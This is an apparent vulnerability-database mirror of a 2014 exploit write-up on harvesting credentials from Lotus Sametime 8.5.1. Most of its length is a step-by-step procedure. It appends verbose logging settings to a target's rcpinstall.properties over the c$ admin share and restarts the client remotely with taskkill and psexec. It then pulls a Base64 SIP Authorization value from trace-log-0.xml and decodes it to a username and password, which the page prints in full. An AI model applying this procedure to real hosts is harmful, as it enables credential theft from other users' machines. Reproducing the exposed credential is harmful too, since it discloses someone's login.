Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30346
HistoryMar 03, 2014 - 12:00 a.m.

Post Exploitation - Getting username and password in the Lotus Sametime 8.5.1

2014-03-0300:00:00
vulners.com
32
JSON

Exploit Title: Post Exploitation - Getting username and password in the Lotus Sametime 8.5.1

Google Dork: n/a

Date: 18/02/2014

Exploit Author: Adriano Marcio Monteiro <[email protected]>

Vendor Homepage: http://www.ibm.com/us/en/

Software Link: http://www-01.ibm.com/support/docview.wss?uid=swg24027054

Version: 8.5.1

Tested on: Windows 7 SP1 x86 pt-br

CVE :

Lotus Sametime is an instant messaging application that includes several features such as video conferencing, phone calls, etc. … In case of problems the Lotus Sametime provides functionality to register and trace log (Menu: Help / Support / Show Tracker). When you enable verbose logging is possible to obtain the user and the user's password (the password is in Base64), according to the procedure below. The vulnerability is in telephony.softphone.service more specifically in Source Class.Method:

com.ibm.ws.sip.stack.transport.TransportLayer
sendMessage

Communication with the server is done via TLS, but the local content communication log is saved in clear text and the password is in base 64. Sample log:

Out Message: [172.29.1.121:62444-&gt;172.28.10.138:5081/TLS]
REGISTER sip:sipserver.meudominio.com.br:5081;transport=tls SIP/2.0
Call-ID: [email protected]
CSeq: 1 REGISTER
From: &lt;sips:adriano.monteiro&#37;[email protected]:5081&gt;;tag=3996.696000502281
To: sips:adriano.monteiro&#37;[email protected]:5081
Via: SIP/2.0/TLS 172.29.1.121:5061;branch=z9hG4bK-6283666955645770411
Max-Forwards: 70	
Contact: sip:172.29.1.121:5061;transport=tls
Expires: 0
User-Agent: Sametime-Softphone-8.5.1.20100709-0934
Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE, UPDATE
Authorization: Basic cred=&quot;YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==&quot;
Content-Length: 0

Using a simple script you can automate the process of getting username and password, but beyond the scope of this tutorial and I will not explain this process here. Use your imagination!

PoC - Proof of Concept

Find the file below:
“\\host.alvo\c$\Users\<usuario.alvo>\Dados de Aplicativos\Lotus\Sametime\.config\rcpinstall.properties”

Add the following lines at the end of the file and save:
com.ibm.collaboration.realtime.internal.telephony.level=FINE
com.ibm.collaboration.realtime.telephony.ui.level=FINE
com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
com.ibm.collaboration.realtime.telephony.softphone.level=FINER
com.ibm.collaboration.realtime.telephony.core.level=FINE
com.ibm.collaboration.realtime.multimedia.phonegrid.level=FINE
com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
com.ibm.collaboration.realtime.multimedia.video.gips.level=FINE
com.ibm.collaboration.realtime.multimedia.phonegrid.internal.gips.level=FINE
com.ibm.collaboration.realtime.telephony.core.level=FINE
com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
com.ibm.collaboration.realtime.telephony.softphone.level=FINER
com.ibm.collaboration.realtime.internal.telephony.level=FINE
com.ibm.collaboration.realtime.telephony.ui.level=FINE
com.ibm.collaboration.realtime.multimedia.level=FINE
com.ibm.collaboration.realtime.internal.telephony.level=FINE
com.ibm.collaboration.realtime.telephony.level=FINE
com.ibm.collaboration.realtime.telephony.tcspi.level=FINEST
com.ibm.collaboration.realtime.telephony.softphone.level=FINER

Restarting the process on the target host:
taskkill /s host.alvo /f /im sametime.exe
psexec –d \\host.alvo cmd.exe /c "%ProgramFiles%\IBM\Lotus\Sametime Connect\rcp\rcplauncher.exe"

In the logs folder:
\\host.alvo\c$\Users\<usuario.alvo>\Dados de aplicativos\Lotus\Sametime\logs

Access the file:
trace-log-0.xml

Search for:
Basic cred=

Example:
<CommonBaseEvent creationTime="2014-02-18T11:44:53.249-03:00" globalInstanceId="ELac1d017d00014445744cd800001c7e" msg="Out Message: [172.29.1.125:58008-&gt;172.28.10.138:5081/TLS] REGISTER sip:server.meudominio.com.br:5081;transport=tls SIP/2.0 Call-ID: [email protected] CSeq: 1 REGISTER From:&lt;sips:adriano.monteiro%[email protected]:5081&gt;;tag=4518.144797347828 To: &lt;sips:adriano.monteiro%[email protected]:5081&gt; Via: SIP/2.0/TLS 172.29.1.125:5061;branch=z9hG4bK-3811914127572726454 Max-Forwards:70 Contact: * Expires: 0 User-Agent: Sametime-Softphone-8.5.1.20100709-0934 Allow: INVITE, ACK, CANCEL, BYE, NOTIFY, INFO, MESSAGE,UPDATE
Authorization: Basic cred=&quot;YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==&quot; Content-Length: 0 " severity="10" version="1.0.1">

The username and password found here:
Authorization: Basic cred=&quot;YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==&quot;

Getting Username and Password:
Site: http://www.base64decode.org/
Decode: YWRyaWFuby5tb250ZWlyb0BtZXVkb21pbmlvLmNvbS5icjpBbW9yMTAxMA==
Result: [email protected]:Amor1010

Bibliography:
http://pic.dhe.ibm.com/infocenter/sametime/v8r5/index.jsp?topic=&#37;2Fcom.ibm.help.sametime.v85.doc&#37;2Ftrouble&#37;2Ftrbl_client_log_trace.html

[end]

JSON